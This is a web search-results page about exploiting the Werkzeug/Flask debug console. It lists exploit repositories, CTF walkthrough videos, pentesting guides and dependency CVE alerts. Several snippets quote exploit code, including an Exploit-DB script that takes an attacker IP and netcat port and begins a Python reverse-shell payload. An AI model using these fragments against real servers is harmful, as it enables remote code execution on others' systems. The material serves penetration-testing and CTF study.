GitHub
github.com › topics › werkzeug-exploit
werkzeug-exploit · GitHub Topics · GitHub
WConsole Extractor is a python library which automatically exploits a Werkzeug development server in debug mode.
GitHub
github.com › its-arun › Werkzeug-Debug-RCE
GitHub - its-arun/Werkzeug-Debug-RCE: Python script for exploiting Werkzeug Debug RCE useful for CTF · GitHub
Python script for exploiting Werkzeug Debug RCE useful for CTFs where you just need to read a particular file or execute some command.
Starred by 39 users
Forked by 22 users
Languages Python
Videos
20:59
Reassembling Werkzeug's Pin - Getting RCE in HackTheBox Agile [Part ...
19:10
Reassembling Werkzeug's Pin - Hacking Flask Debug Mode [Part 1] ...
Werkzeug PIN exploit - TryHackMe's OWASP Top 10 2021
15:27
Workerbee Walkthrough (Werkzeug Debug Pin generation) - YouTube
01:26:38
HackTheBox - Ellingson - YouTube
HackTricks
book.hacktricks.xyz › home › network services pentesting › pentesting web › werkzeug
Werkzeug / Flask Debug - HackTricks
You just have to write a python function that leaks a file content and you have your shell :) \xc2\xb7 GitHub · https://www.daehee.com/werkzeug-console-pin-exploit/
GitHub
github.com › Fare9 › PyWerkzeug-Debug-Command-Execution
GitHub - Fare9/PyWerkzeug-Debug-Command-Execution: python exploit for werkzeug debug shell command execution · GitHub
People would say it's based on MSF exploit (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/werkzeug_debug_rce.rb), but as I couldn't understand at all this exploit, I did it my own exploit.
Starred by 10 users
Forked by 8 users
Languages Python
GitHub
github.com › MistSpark › Vigilant-Exploits › blob › master › Werkzeug_Exploit.py
Vigilant-Exploits/Werkzeug_Exploit.py at master · MistSpark/Vigilant-Exploits
basePort = sys.argv[2]
·
· #INITIAL CONNECTION WITH THE TARGET..
· print u"\n\u001b[32;1mConnecting To The Target...\u001b[0m\n"
· res = requests.get('http://%s:%s/console'% (baseUrl,basePort))
·
· #Checking for Werkzeug Console..
· if "Werkzeug powered traceback interpreter" not in res.text:
·
Author MistSpark
GitHub
github.com › wdahlenburg › werkzeug-debug-console-bypass
GitHub - wdahlenburg/werkzeug-debug-console-bypass: Werkzeug has a debug console that requires a pin. It's possible to bypass this with an LFI vulnerability or use it as a local privilege escalation vector. · GitHub
Werkzeug has a debug console that requires a pin. It's possible to bypass this with an LFI vulnerability or use it as a local privilege escalation vector. - wdahlenburg/werkzeug-debug-conso...
Starred by 64 users
Forked by 7 users
Languages Python 85.8% | Dockerfile 14.2%
GitHub
github.com › sharmas1ddharth › Iris-classification › issues › 30
CVE-2024-34069 (High) detected in Werkzeug-2.2.2-py3-none-any.whl · Issue #30 · sharmas1ddharth/Iris-classification
May 7, 2024 - Exploitability Metrics: Attack Vector: Network · Attack Complexity: High · Privileges Required: None · User Interaction: Required · Scope: Unchanged · Impact Metrics: Confidentiality Impact: High · Integrity Impact: High · Availability Impact: High · For more information on CVSS3 Scores, click here. Suggested Fix · Type: Upgrade version · Origin: GHSA-2g68-c3qc-8985 ·
Author mend-bolt-for-github
GitHub
github.com › grav3m1nd-byte › werkzeug-pin
GitHub - grav3m1nd-byte/werkzeug-pin: Yet another Werkzeug Console Pin Exploit Explanation · GitHub
In this case, we are taking the exploit script a step further and we are relying on subprocess to reuse the HTTP request made through by using curl. Doing this, helps in dynamically getting the victim server information remotely and without relying on python's urllib to make these HTTP requests. Once you find out Werkzeug Console is pin-protected, you need to find a way to get this pin and access the debug console, right?
Author grav3m1nd-byte
GitHub
github.com › opensearch-project › data-prepper › issues › 3552
CVE-2023-46136 (High) detected in Werkzeug-2.2.3-py3-none-any.whl · Issue #3552 · opensearch-project/data-prepper
October 26, 2023 - CVE-2023-46136 - High Severity Vulnerability Vulnerable Library - Werkzeug-2.2.3-py3-none-any.whl The comprehensive WSGI web application library. Library home page: https://files.pythonhosted.org/packages/f6/f8/9da63c1617ae2a1dec2fbf6412...
Author mend-for-github-com
GitHub
github.com › nexmo-community › opentok-session-lambda-python › issues › 4
Werkzeug-2.2.2-py3-none-any.whl: 2 vulnerabilities (highest severity is: 7.5) · Issue #4 · nexmo-community/opentok-session-lambda-python
February 15, 2023 - Browsers may allow "nameless" cookies that look like =value instead of key=value. A vulnerable browser may allow a compromised application on an adjacent subdomain to exploit this to set a cookie like =__Host-test=bad for another subdomain.
Author mend-for-github-com
GitHub
github.com › magma2 › exploit › blob › master › werkzeug.py
exploit/werkzeug.py at master · magma2/exploit
# usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422
·
· if len(sys.argv) != 5:
· print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0])
· sys.exit(-1)
·
·
· response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2]))
·
· if "Werkzeug " not in response.text:
·
Author magma2
GitHub
github.com › am0nsec › exploit › blob › master › python › werkzeug-debug-console › exploit.py
exploit/python/werkzeug-debug-console/exploit.py at master · am0nsec/exploit
Collection of different exploits. Contribute to am0nsec/exploit development by creating an account on GitHub.
Author am0nsec
GitHub
github.com › microsoft › cascadia-code › issues › 649
There is a vulnerability in Werkzeug 2.0.1,upgrade recommended · Issue #649 · microsoft/cascadia-code
August 31, 2022 - cascadia-code/requirements.txt Line 198 in 017bde5 werkzeug==2.0.1 CVE-2022-29361 Recommended upgrade version:2.1.1
Author QiAnXinCodeSafe
GitHub
github.com › Seagate › seagate-tools › issues › 602
CVE-2023-25577 (High) detected in Werkzeug-2.2.2-py3-none-any.whl, Werkzeug-2.0.3-py3-none-any.whl · Issue #602 · Seagate/seagate-tools
February 15, 2023 - CVE-2023-25577 - High Severity Vulnerability Vulnerable Libraries - Werkzeug-2.2.2-py3-none-any.whl, Werkzeug-2.0.3-py3-none-any.whl Werkzeug-2.2.2-py3-none-any.whl The comprehensive WSGI web appli...
Author mend-for-github-com
GitHub
github.com › KOSASIH › pi-nexus-autonomous-banking-network › issues › 22
Werkzeug-2.2.3-py3-none-any.whl: 2 vulnerabilities (highest severity is: 7.5) - autoclosed · Issue #22 · KOSASIH/pi-nexus-autonomous-banking-network
May 9, 2024 - Exploitability Metrics: Attack Vector: Network · Attack Complexity: Low · Privileges Required: None · User Interaction: None · Scope: Unchanged · Impact Metrics: Confidentiality Impact: None · Integrity Impact: None · Availability Impact: High · For more information on CVSS3 Scores, click here. Type: Upgrade version · Origin: GHSA-hrfv-mqp8-q5rw · Release Date: 2023-10-25 · Fix Resolution: werkzeug - 2.3.8,3.0.1 ·
Author mend-bolt-for-github
Exploit Notes
exploit-notes.hdks.org › exploit › web › framework › python › werkzeug-pentesting
Werkzeug Pentesting - Exploit Notes
January 18, 2024 - To use Exploit Notes locally, run the following command: git clone https://github.com/hdks-bug/exploitnotes.git cd exploitnotes python3 -m venv .venv source .venv/bin/activate pip3 install -r requirements.txt zensical serve
Exploit-DB
exploit-db.com › exploits › 43905
Werkzeug - 'Debug Shell' Command Execution - Multiple remote Exploit
January 28, 2018 - #!/usr/bin/env python import requests import sys import re import urllib # usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if len(sys.argv) != 5: print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0]) sys.exit(-1) response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2])) if "Werkzeug " not in response.text: print "[-] Debug is not enabled" sys.exit(-1) # since the application or debugger about python using python for reverse connect cmd = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%